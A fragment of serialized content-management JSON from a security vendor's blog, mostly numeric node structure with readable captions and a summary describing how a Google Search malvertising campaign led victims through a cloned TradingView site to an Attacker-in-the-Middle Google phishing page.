Type":173},{},[52405],{"type":194},{"data":52407,"marks":52408,"value":42072,"nodeType":173},{},[],{"data":52410,"content":52411,"nodeType":231},{},[],{"data":52413,"content":52414,"nodeType":169},{},[52415],{"data":52416,"marks":52417,"value":42083,"nodeType":173},{},[52418],{"type":370},{"data":52420,"content":52421,"nodeType":178},{},[52422,52425,52432],{"data":52423,"marks":52424,"value":42090,"nodeType":173},{},[],{"data":52426,"content":52427,"nodeType":186},{"uri":42093},[52428],{"data":52429,"marks":52430,"value":8157,"nodeType":173},{},[52431],{"type":194},{"data":52433,"marks":52434,"value":42102,"nodeType":173},{},[],{"data":52436,"content":52439,"nodeType":312},{"target":52437},{"sys":52438},{"id":42107,"type":317,"linkType":318},[],{"data":52441,"content":52442,"nodeType":178},{},[52443],{"data":52444,"marks":52445,"value":42115,"nodeType":173},{},[],{"data":52447,"content":52448,"nodeType":178},{},[52449,52452,52459],{"data":52450,"marks":52451,"value":41484,"nodeType":173},{},[],{"data":52453,"content":52454,"nodeType":186},{"uri":1842},[52455],{"data":52456,"marks":52457,"value":1845,"nodeType":173},{},[52458],{"type":194},{"data":52460,"marks":52461,"value":41495,"nodeType":173},{},[],{"data":52463,"content":52464,"nodeType":235},{},[52465],{"data":52466,"marks":52467,"value":42139,"nodeType":173},{},[52468],{"type":370},{"data":52470,"content":52471,"nodeType":178},{},[52472],{"data":52473,"marks":52474,"value":42146,"nodeType":173},{},[],{"data":52476,"content":52477,"nodeType":178},{},[52478],{"data":52479,"marks":52480,"value":42153,"nodeType":173},{},[],{"data":52482,"content":52483,"nodeType":178},{},[52484],{"data":52485,"marks":52486,"value":41463,"nodeType":173},{},[],{"data":52488,"content":52489,"nodeType":178},{},[52490,52493,52500],{"data":52491,"marks":52492,"value":42166,"nodeType":173},{},[],{"data":52494,"content":52495,"nodeType":186},{"uri":5002},[52496],{"data":52497,"marks":52498,"value":6811,"nodeType":173},{},[52499],{"type":194},{"data":52501,"marks":52502,"value":42177,"nodeType":173},{},[],{"data":52504,"content":52505,"nodeType":235},{},[52506],{"data":52507,"marks":52508,"value":42185,"nodeType":173},{},[52509],{"type":370},{"data":52511,"content":52512,"nodeType":178},{},[52513],{"data":52514,"marks":52515,"value":42192,"nodeType":173},{},[],{"data":52517,"content":52520,"nodeType":312},{"target":52518},{"sys":52519},{"id":42197,"type":317,"linkType":318},[],{"data":52522,"content":52523,"nodeType":231},{},[],{"data":52525,"content":52526,"nodeType":169},{},[52527],{"data":52528,"marks":52529,"value":8406,"nodeType":173},{},[52530],{"type":370},{"data":52532,"content":52533,"nodeType":178},{},[52534],{"data":52535,"marks":52536,"value":42215,"nodeType":173},{},[],{"data":52538,"content":52539,"nodeType":178},{},[52540],{"data":52541,"marks":52542,"value":41621,"nodeType":173},{},[],{"data":52544,"content":52545,"nodeType":231},{},[],{"data":52547,"content":52548,"nodeType":169},{},[52549],{"data":52550,"marks":52551,"value":2824,"nodeType":173},{},[52552],{"type":370},{"data":52554,"content":52555,"nodeType":178},{},[52556],{"data":52557,"marks":52558,"value":42238,"nodeType":173},{},[],{"data":52560,"content":52561,"nodeType":178},{},[52562],{"data":52563,"marks":52564,"value":1444,"nodeType":173},{},[],{"data":52566,"content":52567,"nodeType":178},{},[52568,52571,52578,52581,52588],{"data":52569,"marks":52570,"value":1451,"nodeType":173},{},[],{"data":52572,"content":52573,"nodeType":186},{"uri":1456},[52574],{"data":52575,"marks":52576,"value":1459,"nodeType":173},{},[52577],{"type":194},{"data":52579,"marks":52580,"value":1464,"nodeType":173},{},[],{"data":52582,"content":52583,"nodeType":186},{"uri":1469},[52584],{"data":52585,"marks":52586,"value":1472,"nodeType":173},{},[52587],{"type":194},{"data":52589,"marks":52590,"value":1477,"nodeType":173},{},[],{"data":52592,"content":52595,"nodeType":312},{"target":52593},{"sys":52594},{"id":8590,"type":317,"linkType":318},[],{"data":52597,"content":52598,"nodeType":178},{},[52599],{"data":52600,"marks":52601,"value":37,"nodeType":173},{},[],{"items":52603},[52604,52606],{"sys":52605,"name":505},{"id":504},{"sys":52607,"name":509},{"id":508},{"items":52609},[52610],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":52611},{"url":8615},{"__typename":1528,"sys":52613,"content":52614,"title":21090,"synopsis":21091,"hashTags":118,"publishedDate":21092,"slug":21093,"tagsCollection":53111,"authorsCollection":53117},{"id":20516},{"json":52615},{"nodeType":165,"data":52616,"content":52617},{},[52618,52624,52630,52640,52645,52651,52654,52661,52667,52672,52685,52691,52712,52718,52723,52726,52733,52759,52764,52780,52785,52801,52807,52812,52815,52822,52828,52844,52850,52866,52872,52877,52880,52887,52893,52923,52929,52935,52975,52990,52999,53005,53008,53015,53031,53037,53043,53048,53051,53058,53074,53100,53105],{"nodeType":178,"data":52619,"content":52620},{},[52621],{"nodeType":173,"value":20525,"marks":52622,"data":52623},[],{},{"nodeType":178,"data":52625,"content":52626},{},[52627],{"nodeType":173,"value":20532,"marks":52628,"data":52629},[],{},{"nodeType":178,"data":52631,"content":52632},{},[52633,52636],{"nodeType":173,"value":20539,"marks":52634,"data":52635},[],{},{"nodeType":173,"value":20543,"marks":52637,"data":52639},[52638],{"type":370},{},{"nodeType":312,"data":52641,"content":52644},{"target":52642},{"sys":52643},{"id":8032,"type":317,"linkType":318},[],{"nodeType":178,"data":52646,"content":52647},{},[52648],{"nodeType":173,"value":20556,"marks":52649,"data":52650},[],{},{"nodeType":231,"data":52652,"content":52653},{},[],{"nodeType":169,"data":52655,"content":52656},{},[52657],{"nodeType":173,"value":20566,"marks":52658,"data":52660},[52659],{"type":370},{},{"nodeType":178,"data":52662,"content":52663},{},[52664],{"nodeType":173,"value":20574,"marks":52665,"data":52666},[],{},{"nodeType":312,"data":52668,"content":52671},{"target":52669},{"sys":52670},{"id":20581,"type":317,"linkType":318},[],{"nodeType":178,"data":52673,"content":52674},{},[52675,52678,52682],{"nodeType":173,"value":20587,"marks":52676,"data":52677},[],{},{"nodeType":173,"value":20591,"marks":52679,"data":52681},[52680],{"type":370},{},{"nodeType":173,"value":20596,"marks":52683,"data":52684},[],{},{"nodeType":178,"data":52686,"content":52687},{},[52688],{"nodeType":173,"value":20603,"marks":52689,"data":52690},[],{},{"nodeType":250,"data":52692,"content":52693},{},[52694,52703],{"nodeType":254,"data":52695,"content":52696},{},[52697],{"nodeType":178,"data":52698,"content":52699},{},[52700],{"nodeType":173,"value":20616,"marks":52701,"data":52702},[],{},{"nodeType":254,"data":52704,"content":52705},{},[52706],{"nodeType":178,"data":52707,"content":52708},{},[52709],{"nodeType":173,"value":20626,"marks":52710,"data":52711},[],{},{"nodeType":178,"data":52713,"content":52714},{},[52715],{"nodeType":173,"value":20633,"marks":52716,"data":52717},[],{},{"nodeType":312,"data":52719,"content":52722},{"target":52720},{"sys":52721},{"id":20640,"type":317,"linkType":318},[],{"nodeType":231,"data":52724,"content":52725},{},[],{"nodeType":169,"data":52727,"content":52728},{},[52729],{"nodeType":173,"value":20649,"marks":52730,"data":52732},[52731],{"type":370},{},{"nodeType":178,"data":52734,"content":52735},{},[52736,52739,52746,52749,52756],{"nodeType":173,"value":20657,"marks":52737,"data":52738},[],{},{"nodeType":186,"data":52740,"content":52741},{"uri":8043},[52742],{"nodeType":173,"value":20664,"marks":52743,"data":52745},[52744],{"type":194},{},{"nodeType":173,"value":20669,"marks":52747,"data":52748},[],{},{"nodeType":186,"data":52750,"content":52751},{"uri":20674},[52752],{"nodeType":173,"value":20677,"marks":52753,"data":52755},[52754],{"type":194},{},{"nodeType":173,"value":20682,"marks":52757,"data":52758},[],{},{"nodeType":312,"data":52760,"content":52763},{"target":52761},{"sys":52762},{"id":20689,"type":317,"linkType":318},[],{"nodeType":178,"data":52765,"content":52766},{},[52767,52770,52777],{"nodeType":173,"value":20695,"marks":52768,"data":52769},[],{},{"nodeType":186,"data":52771,"content":52772},{"uri":20700},[52773],{"nodeType":173,"value":20703,"marks":52774,"data":52776},[52775],{"type":194},{},{"nodeType":173,"value":197,"marks":52778,"data":52779},[],{},{"nodeType":312,"data":52781,"content":52784},{"target":52782},{"sys":52783},{"id":20714,"type":317,"linkType":318},[],{"nodeType":178,"data":52786,"content":52787},{},[52788,52791,52798],{"nodeType":173,"value":20720,"marks":52789,"data":52790},[],{},{"nodeType":186,"data":52792,"content":52793},{"uri":20725},[52794],{"nodeType":173,"value":8157,"marks":52795,"data":52797},[52796],{"type":194},{},{"nodeType":173,"value":20732,"marks":52799,"data":52800},[],{},{"nodeType":178,"data":52802,"content":52803},{},[52804],{"nodeType":173,"value":20739,"marks":52805,"data":52806},[],{},{"nodeType":312,"data":52808,"content":52811},{"target":52809},{"sys":52810},{"id":20746,"type":317,"linkType":318},[],{"nodeType":231,"data":52813,"content":52814},{},[],{"nodeType":169,"data":52816,"content":52817},{},[52818],{"nodeType":173,"value":20755,"marks":52819,"data":52821},[52820],{"type":370},{},{"nodeType":178,"data":52823,"content":52824},{},[52825],{"nodeType":173,"value":20763,"marks":52826,"data":52827},[],{},{"nodeType":178,"data":52829,"content":52830},{},[52831,52834,52841],{"nodeType":173,"value":20770,"marks":52832,"data":52833},[],{},{"nodeType":186,"data":52835,"content":52836},{"uri":20775},[52837],{"nodeType":173,"value":20778,"marks":52838,"data":52840},[52839],{"type":194},{},{"nodeType":173,"value":20783,"marks":52842,"data":52843},[],{},{"nodeType":178,"data":52845,"content":52846},{},[52847],{"nodeType":173,"value":20790,"marks":52848,"data":52849},[],{},{"nodeType":178,"data":52851,"content":52852},{},[52853,52856,52863],{"nodeType":173,"value":20797,"marks":52854,"data":52855},[],{},{"nodeType":186,"data":52857,"content":52858},{"uri":20802},[52859],{"nodeType":173,"value":20805,"marks":52860,"data":52862},[52861],{"type":194},{},{"nodeType":173,"value":20810,"marks":52864,"data":52865},[],{},{"nodeType":178,"data":52867,"content":52868},{},[52869],{"nodeType":173,"value":20817,"marks":52870,"data":52871},[],{},{"nodeType":312,"data":52873,"content":52876},{"target":52874},{"sys":52875},{"id":20824,"type":317,"linkType":318},[],{"nodeType":231,"data":52878,"content":52879},{},[],{"nodeType":169,"data":52881,"content":52882},{},[52883],{"nodeType":173,"value":20833,"marks":52884,"data":52886},[52885],{"type":370},{},{"nodeType":178,"data":52888,"content":52889},{},[52890],{"nodeType":173,"value":20841,"marks":52891,"data":52892},[],{},{"nodeType":250,"data":52894,"content":52895},{},[52896,52905,52914],{"nodeType":254,"data":52897,"content":52898},{},[52899],{"nodeType":178,"data":52900,"content":52901},{},[52902],{"nodeType":173,"value":20854,"marks":52903,"data":52904},[],{},{"nodeType":254,"data":52906,"content":52907},{},[52908],{"nodeType":178,"data":52909,"content":52910},{},[52911],{"nodeType":173,"value":20864,"marks":52912,"data":52913},[],{},{"nodeType":254,"data":52915,"content":52916},{},[52917],{"nodeType":178,"data":52918,"content":52919},{},[52920],{"nodeType":173,"value":20874,"marks":52921,"data":52922},[],{},{"nodeType":178,"data":52924,"content":52925},{},[52926],{"nodeType":173,"value":20881,"marks":52927,"data":52928},[],{},{"nodeType":178,"data":52930,"content":52931},{},[52932],{"nodeType":173,"value":20888,"marks":52933,"data":52934},[],{},{"nodeType":250,"data":52936,"content":52937},{},[52938,52957,52966],{"nodeType":254,"data":52939,"content":52940},{},[52941],{"nodeType":178,"data":52942,"content":52943},{},[52944,52947,52954],{"nodeType":173,"value":20901,"marks":52945,"data":52946},[],{},{"nodeType":186,"data":52948,"content":52949},{"uri":20906},[52950],{"nodeType":173,"value":20909,"marks":52951,"data":52953},[52952],{"type":194},{},{"nodeType":173,"value":20914,"marks":52955,"data":52956},[],{},{"nodeType":254,"data":52958,"content":52959},{},[52960],{"nodeType":178,"data":52961,"content":52962},{},[52963],{"nodeType":173,"value":20924,"marks":52964,"data":52965},[],{},{"nodeType":254,"data":52967,"content":52968},{},[52969],{"nodeType":178,"data":52970,"content":52971},{},[52972],{"nodeType":173,"value":20934,"marks":52973,"data":52974},[],{},{"nodeType":178,"data":52976,"content":52977},{},[52978,52981,52987],{"nodeType":173,"value":20941,"marks":52979,"data":52980},[],{},{"nodeType":186,"data":52982,"content":52983},{"uri":1252},[52984],{"nodeType":173,"value":20948,"marks":52985,"data":52986},[],{},{"nodeType":173,"value":20952,"marks":52988,"data":52989},[],{},{"nodeType":3769,"data":52991,"content":52992},{},[52993],{"nodeType":178,"data":52994,"content":52995},{},[52996],{"nodeType":173,"value":20962,"marks":52997,"data":52998},[],{},{"nodeType":178,"data":53000,"content":53001},{},[53002],{"nodeType":173,"value":20969,"marks":53003,"data":53004},[],{},{"nodeType":231,"data":53006,"content":53007},{},[],{"nodeType":169,"data":53009,"content":53010},{},[53011],{"nodeType":173,"value":20979,"marks":53012,"data":53014},[53013],{"type":370},{},{"nodeType":178,"data":53016,"content":53017},{},[53018,53021,53028],{"nodeType":173,"value":20987,"marks":53019,"data":53020},[],{},{"nodeType":186,"data":53022,"content":53023},{"uri":20992},[53024],{"nodeType":173,"value":20995,"marks":53025,"data":53027},[53026],{"type":194},{},{"nodeType":173,"value":21000,"marks":53029,"data":53030},[],{},{"nodeType":178,"data":53032,"content":53033},{},[53034],{"nodeType":173,"value":21007,"marks":53035,"data":53036},[],{},{"nodeType":178,"data":53038,"content":53039},{},[53040],{"nodeType":173,"value":21014,"marks":53041,"data":53042},[],{},{"nodeType":312,"data":53044,"content":53047},{"target":53045},{"sys":53046},{"id":21021,"type":317,"linkType":318},[],{"nodeType":231,"data":53049,"content":53050},{},[],{"nodeType":169,"data":53052,"content":53053},{},[53054],{"nodeType":173,"value":18605,"marks":53055,"data":53057},[53056],{"type":370},{},{"nodeType":178,"data":53059,"content":53060},{},[53061,53064,53071],{"nodeType":173,"value":21037,"marks":53062,"data":53063},[],{},{"nodeType":186,"data":53065,"content":53066},{"uri":21042},[53067],{"nodeType":173,"value":21045,"marks":53068,"data":53070},[53069],{"type":194},{},{"nodeType":173,"value":21050,"marks":53072,"data":53073},[],{},{"nodeType":178,"data":53075,"content":53076},{},[53077,53080,53087,53090,53097],{"nodeType":173,"value":1451,"marks":53078,"data":53079},[],{},{"nodeType":186,"data":53081,"content":53082},{"uri":1456},[53083],{"nodeType":173,"value":1459,"marks":53084,"data":53086},[53085],{"type":194},{},{"nodeType":173,"value":1464,"marks":53088,"data":53089},[],{},{"nodeType":186,"data":53091,"content":53092},{"uri":1469},[53093],{"nodeType":173,"value":1472,"marks":53094,"data":53096},[53095],{"type":194},{},{"nodeType":173,"value":1477,"marks":53098,"data":53099},[],{},{"nodeType":312,"data":53101,"content":53104},{"target":53102},{"sys":53103},{"id":20640,"type":317,"linkType":318},[],{"nodeType":178,"data":53106,"content":53107},{},[53108],{"nodeType":173,"value":37,"marks":53109,"data":53110},[],{},{"items":53112},[53113,53115],{"sys":53114,"name":509},{"id":508},{"sys":53116,"name":505},{"id":504},{"items":53118},[53119],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":53120},{"url":1496},{"items":53122},[53123],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":53124},{"url":1496},{"json":53126,"links":53505},{"data":53127,"content":53128,"nodeType":165},{},[53129,53135,53141,53147,53153,53158,53161,53168,53174,53179,53185,53190,53195,53201,53206,53212,53217,53223,53228,53231,53238,53254,53261,53277,53293,53298,53305,53321,53326,53331,53337,53340,53347,53363,53368,53374,53377,53384,53400,53406,53436,53439,53446,53462,53468,53494,53499],{"data":53130,"content":53131,"nodeType":178},{},[53132],{"data":53133,"marks":53134,"value":40892,"nodeType":173},{},[],{"data":53136,"content":53137,"nodeType":178},{},[53138],{"data":53139,"marks":53140,"value":40899,"nodeType":173},{},[],{"data":53142,"content":53143,"nodeType":178},{},[53144],{"data":53145,"marks":53146,"value":40906,"nodeType":173},{},[],{"data":53148,"content":53149,"nodeType":178},{},[53150],{"data":53151,"marks":53152,"value":40913,"nodeType":173},{},[],{"data":53154,"content":53157,"nodeType":312},{"target":53155},{"sys":53156},{"id":40918,"type":317,"linkType":318},[],{"data":53159,"content":53160,"nodeType":231},{},[],{"data":53162,"content":53163,"nodeType":169},{},[53164],{"data":53165,"marks":53166,"value":14096,"nodeType":173},{},[53167],{"type":370},{"data":53169,"content":53170,"nodeType":178},{},[53171],{"data":53172,"marks":53173,"value":40936,"nodeType":173},{},[],{"data":53175,"content":53178,"nodeType":312},{"target":53176},{"sys":53177},{"id":40941,"type":317,"linkType":318},[],{"data":53180,"content":53181,"nodeType":178},{},[53182],{"data":53183,"marks":53184,"value":40949,"nodeType":173},{},[],{"data":53186,"content":53189,"nodeType":312},{"target":53187},{"sys":53188},{"id":40954,"type":317,"linkType":318},[],{"data":53191,"content":53194,"nodeType":312},{"target":53192},{"sys":53193},{"id":40960,"type":317,"linkType":318},[],{"data":53196,"content":53197,"nodeType":178},{},[53198],{"data":53199,"marks":53200,"value":40968,"nodeType":173},{},[],{"data":53202,"content":53205,"nodeType":312},{"target":53203},{"sys":53204},{"id":40973,"type":317,"linkType":318},[],{"data":53207,"content":53208,"nodeType":178},{},[53209],{"data":53210,"marks":53211,"value":40981,"nodeType":173},{},[],{"data":53213,"content":53216,"nodeType":312},{"target":53214},{"sys":53215},{"id":40986,"type":317,"linkType":318},[],{"data":53218,"content":53219,"nodeType":178},{},[53220],{"data":53221,"marks":53222,"value":40994,"nodeType":173},{},[],{"data":53224,"content":53227,"nodeType":312},{"target":53225},{"sys":53226},{"id":40999,"type":317,"linkType":318},[],{"data":53229,"content":53230,"nodeType":231},{},[],{"data":53232,"content":53233,"nodeType":169},{},[53234],{"data":53235,"marks":53236,"value":41011,"nodeType":173},{},[53237],{"type":370},{"data":53239,"content":53240,"nodeType":178},{},[53241,53244,53251],{"data":53242,"marks":53243,"value":41018,"nodeType":173},{},[],{"data":53245,"content":53246,"nodeType":186},{"uri":6820},[53247],{"data":53248,"marks":53249,"value":8157,"nodeType":173},{},[53250],{"type":194},{"data":53252,"marks":53253,"value":41029,"nodeType":173},{},[],{"data":53255,"content":53256,"nodeType":235},{},[53257],{"data":53258,"marks":53259,"value":41037,"nodeType":173},{},[53260],{"type":370},{"data":53262,"content":53263,"nodeType":178},{},[53264,53267,53274],{"data":53265,"marks":53266,"value":41044,"nodeType":173},{},[],{"data":53268,"content":53269,"nodeType":186},{"uri":8043},[53270],{"data":53271,"marks":53272,"value":8046,"nodeType":173},{},[53273],{"type":194},{"data":53275,"marks":53276,"value":41055,"nodeType":173},{},[],{"data":53278,"content":53279,"nodeType":178},{},[53280,53283,53290],{"data":53281,"marks":53282,"value":41062,"nodeType":173},{},[],{"data":53284,"content":53285,"nodeType":186},{"uri":5002},[53286],{"data":53287,"marks":53288,"value":6811,"nodeType":173},{},[53289],{"type":194},{"data":53291,"marks":53292,"value":41073,"nodeType":173},{},[],{"data":53294,"content":53297,"nodeType":312},{"target":53295},{"sys":53296},{"id":41078,"type":317,"linkType":318},[],{"data":53299,"content":53300,"nodeType":235},{},[53301],{"data":53302,"marks":53303,"value":41087,"nodeType":173},{},[53304],{"type":370},{"data":53306,"content":53307,"nodeType":178},{},[53308,53311,53318],{"data":53309,"marks":53310,"value":41094,"nodeType":173},{},[],{"data":53312,"content":53313,"nodeType":186},{"uri":7853},[53314],{"data":53315,"marks":53316,"value":7856,"nodeType":173},{},[53317],{"type":194},{"data":53319,"marks":53320,"value":41105,"nodeType":173},{},[],{"data":53322,"content":53325,"nodeType":312},{"target":53323},{"sys":53324},{"id":41110,"type":317,"linkType":318},[],{"data":53327,"content":53330,"nodeType":312},{"target":53328},{"sys":53329},{"id":41116,"type":317,"linkType":318},[],{"data":53332,"content":53333,"nodeType":178},{},[53334],{"data":53335,"marks":53336,"value":41124,"nodeType":173},{},[],{"data":53338,"content":53339,"nodeType":231},{},[],{"data":53341,"content":53342,"nodeType":169},{},[53343],{"data":53344,"marks":53345,"value":41135,"nodeType":173},{},[53346],{"type":370},{"data":53348,"content":53349,"nodeType":178},{},[53350,53353,53360],{"data":53351,"marks":53352,"value":37,"nodeType":173},{},[],{"data":53354,"content":53355,"nodeType":186},{"uri":41144},[53356],{"data":53357,"marks":53358,"value":41150,"nodeType":173},{},[53359],{"type":194},{"data":53361,"marks":53362,"value":41154,"nodeType":173},{},[],{"data":53364,"content":53367,"nodeType":312},{"target":53365},{"sys":53366},{"id":41159,"type":317,"linkType":318},[],{"data":53369,"content":53370,"nodeType":178},{},[53371],{"data":53372,"marks":53373,"value":41167,"nodeType":173},{},[],{"data":53375,"content":53376,"nodeType":231},{},[],{"data":53378,"content":53379,"nodeType":169},{},[53380],{"data":53381,"marks":53382,"value":8406,"nodeType":173},{},[53383],{"type":370},{"data":53385,"content":53386,"nodeType":178},{},[53387,53390,53397],{"data":53388,"marks":53389,"value":8414,"nodeType":173},{},[],{"data":53391,"content":53392,"nodeType":186},{"uri":8419},[53393],{"data":53394,"marks":53395,"value":8422,"nodeType":173},{},[53396],{"type":194},{"data":53398,"marks":53399,"value":8427,"nodeType":173},{},[],{"data":53401,"content":53402,"nodeType":178},{},[53403],{"data":53404,"marks":53405,"value":14399,"nodeType":173},{},[],{"data":53407,"content":53408,"nodeType":250},{},[53409,53418,53427],{"data":53410,"content":53411,"nodeType":254},{},[53412],{"data":53413,"content":53414,"nodeType":178},{},[53415],{"data":53416,"marks":53417,"value":41212,"nodeType":173},{},[],{"data":53419,"content":53420,"nodeType":254},{},[53421],{"data":53422,"content":53423,"nodeType":178},{},[53424],{"data":53425,"marks":53426,"value":41222,"nodeType":173},{},[],{"data":53428,"content":53429,"nodeType":254},{},[53430],{"data":53431,"content":53432,"nodeType":178},{},[53433],{"data":53434,"marks":53435,"value":41232,"nodeType":173},{},[],{"data":53437,"content":53438,"nodeType":231},{},[],{"data":53440,"content":53441,"nodeType":169},{},[53442],{"data":53443,"marks":53444,"value":8517,"nodeType":173},{},[53445],{"type":370},{"data":53447,"content":53448,"nodeType":178},{},[53449,53452,53459],{"data":53450,"marks":53451,"value":8538,"nodeType":173},{},[],{"data":53453,"content":53454,"nodeType":186},{"uri":6820},[53455],{"data":53456,"marks":53457,"value":8545,"nodeType":173},{},[53458],{"type":194},{"data":53460,"marks":53461,"value":8550,"nodeType":173},{},[],{"data":53463,"content":53464,"nodeType":178},{},[53465],{"data":53466,"marks":53467,"value":26673,"nodeType":173},{},[],{"data":53469,"content":53470,"nodeType":178},{},[53471,53474,53481,53484,53491],{"data":53472,"marks":53473,"value":1451,"nodeType":173},{},[],{"data":53475,"content":53476,"nodeType":186},{"uri":1456},[53477],{"data":53478,"marks":53479,"value":1459,"nodeType":173},{},[53480],{"type":194},{"data":53482,"marks":53483,"value":1464,"nodeType":173},{},[],{"data":53485,"content":53486,"nodeType":186},{"uri":1469},[53487],{"data":53488,"marks":53489,"value":1472,"nodeType":173},{},[53490],{"type":194},{"data":53492,"marks":53493,"value":1477,"nodeType":173},{},[],{"data":53495,"content":53498,"nodeType":312},{"target":53496},{"sys":53497},{"id":8590,"type":317,"linkType":318},[],{"data":53500,"content":53501,"nodeType":178},{},[53502],{"data":53503,"marks":53504,"value":37,"nodeType":173},{},[],{"entries":53506},{"hyperlink":53507,"inline":53508,"block":53509},[],[],[53510,53514,53520,53525,53531,53536,53541,53548,53605,53609,53615,53622],{"sys":53511,"__typename":5434,"title":53512,"arcadeDemoUrl":53513,"playText":5437},{"id":40918},"TradingView Malvertising Attack Walkthrough","https://demo.arcade.software/EIVP2emVADsDxut9CZjO?embed",{"sys":53515,"__typename":5345,"title":53516,"caption":53516,"layoutMode":118,"file":53517},{"id":40941},"Initial landing page used as a redirect. This looks similar to many vibe coded sites used by attackers as part of their malvertising and phishing link chains. ",{"url":53518,"width":5358,"height":53519},"https://images.ctfassets.net/y1cdw1ablpvd/2hBe7jYE9VEuAeICiV0yfU/642f74f4212c238e06090c256c9408bf/image5.png",1204,{"sys":53521,"__typename":5345,"title":53522,"caption":53522,"layoutMode":118,"file":53523},{"id":40954},"Cloned TradingView site.",{"url":53524,"width":5358,"height":53519},"https://images.ctfassets.net/y1cdw1ablpvd/71PIYOQpNCGqP35OOeOg44/0823d6231bc3ab492da47436e985025e/image7.png",{"sys":53526,"__typename":5345,"title":53527,"caption":53527,"layoutMode":118,"file":53528},{"id":40960},"The cloned TradingView site is almost identical to the real site.",{"url":53529,"width":5358,"height":53530},"https://images.ctfassets.net/y1cdw1ablpvd/5MLctABFj0A38eIBtaZCAg/b420ac0c7e9b04f55f1b76a80627b373/image8.png",613,{"sys":53532,"__typename":5345,"title":53533,"caption":53533,"layoutMode":118,"file":53534},{"id":40973},"Convincing page prompting the victim to sign in with Google. ",{"url":53535,"width":5358,"height":53519},"https://images.ctfassets.net/y1cdw1ablpvd/1hBfWMM1qhV7rKbwuieCB8/5ce3047801ac23b777fd6ae5ff03d7f4/image4.png",{"sys":53537,"__typename":5345,"title":53538,"caption":53538,"layoutMode":118,"file":53539},{"id":40986},"Attacker-in-the-Middle phishing page targeting Google. ",{"url":53540,"width":5358,"height":53519},"https://images.ctfassets.net/y1cdw1ablpvd/192mknDIa1Cr7uVyjW0msk/ba0c0f272cac424e50ff0ad5a3eeb84e/image3.png",{"sys":53542,"__typename":5345,"title":53543,"caption":53543,"layoutMode":118,"file":53544},{"id":40999},"Push’s timeline of URLs and user actions throughout the phishing attack chain.",{"url":53545,"width":53546,"height":53547},"https://images.ctfassets.net/y1cdw1ablpvd/1JoNJ3qxJgcpXZ4gBI5NeS/f52878e53e7b647e8258f6991b8bfb1d/image6.png",1820,1130,{"sys":53549,"__typename":5311,"content":53550,"name":53604,"title":118},{"id":41078},{"json":53551},{"data":53552,"content":53553,"nodeType":165},{},[53554,53585],{"data":53555,"content":53556,"nodeType":178},{},[53557,53561,53569,53573,53581],{"data":53558,"marks":53559,"value":53560,"nodeType":173},{},[],"We’ve noticed a significant ",{"data":53562,"content":53563,"nodeType":186},{"uri":14017},[53564],{"data":53565,"marks":53566,"value":53568,"nodeType":173},{},[53567],{"type":194},"increase in malvertising attacks",{"data":53570,"marks":53571,"value":53572,"nodeType":173},{},[]," for the delivery of phishing links, malware downloads, and ClickFix-style attacks (",{"data":53574,"content":53575,"nodeType":186},{"uri":1842},[53576],{"data":53577,"marks":53578,"value":53580,"nodeType":173},{},[53579],{"type":194},"4 in 5 ClickFix attacks intercepted by Push were delivered via Google Search",{"data":53582,"marks":53583,"value":53584,"nodeType":173},{},[],").",{"data":53586,"content":53587,"nodeType":178},{},[53588,53592,53600],{"data":53589,"marks":53590,"value":53591,"nodeType":173},{},[],"At the same time, ",{"data":53593,"content":53594,"nodeType":186},{"uri":14040},[53595],{"data":53596,"marks":53597,"value":53599,"nodeType":173},{},[53598],{"type":194},"attacks targeting ad management accounts",{"data":53601,"marks":53602,"value":53603,"nodeType":173},{},[]," used to propagate malicious ads are also on the rise, indicating that this is an area of focus for attackers.","Google malvertising blog insight box 1",{"sys":53606,"__typename":5345,"title":53607,"caption":53607,"layoutMode":118,"file":53608},{"id":41110},"Loading the initial URL directly serves up a benign website rather than redirecting to the next stage in the phishing chain.",{"url":53518,"width":5358,"height":53519},{"sys":53610,"__typename":5345,"title":53611,"caption":53611,"layoutMode":118,"file":53612},{"id":41116},"Attempting to manually load the second site in the phishing chain results in access being denied, where conditional loading parameters are missing.",{"url":53613,"width":5358,"height":53614},"https://images.ctfassets.net/y1cdw1ablpvd/16FOwZxxctoxktnsj9y0Rk/35de320ebb1163758bfa899020766b88/image2.png",1095,{"sys":53616,"__typename":5345,"title":53617,"caption":53617,"layoutMode":118,"file":53618},{"id":41159},"TradingView ClickFix lure reported by Bleeping Computer.",{"url":53619,"width":53620,"height":53621},"https://images.ctfassets.net/y1cdw1ablpvd/5aQwcuSaJTqHma3pOPoijI/14515ddb907526c8d2867275f3f4e164/image1.png",688,525,{"sys":53623,"__typename":15269,"type":15270,"ctaText":49208,"buttonLabel":15277,"buttonColour":15273,"buttonUrl":49143},{"id":8590},"content:blog:analysing-a-sophisticated-google-malvertising-attack.json","blog/analysing-a-sophisticated-google-malvertising-attack.json","blog/analysing-a-sophisticated-google-malvertising-attack",{"_path":53628,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":53629,"ogImage":118,"summary":53631,"title":41689,"subtitle":118,"metaTitle":53642,"synopsis":41690,"hashTags":118,"publishedDate":41691,"slug":41692,"tagsCollection":53643,"relatedBlogPostsCollection":53649,"authorsCollection":55163,"content":55167,"_id":55591,"_type":5439,"_source":5440,"_file":55592,"_stem":55593,"_extension":5439},"/blog/analysing-a-malvertising-attack-targeting-business-google-accounts",{"id":24155,"publishedAt":53630},"2025-12-02T17:33:49.832Z",{"json":53632},{"data":53633,"content":53634,"nodeType":165},{},[53635],{"data":53636,"content":53637,"nodeType":178},{},[53638],{"data":53639,"marks":53640,"value":53641,"nodeType":173},{},[],"Our browser-based security platform recently intercepted a malvertising attack against Push customers. This attack was notable in that it used malvertising via Google Search as the delivery vector, circumventing email-based security controls. Here’s our breakdown. ","Analysing a malvertising attack targeting Google accounts 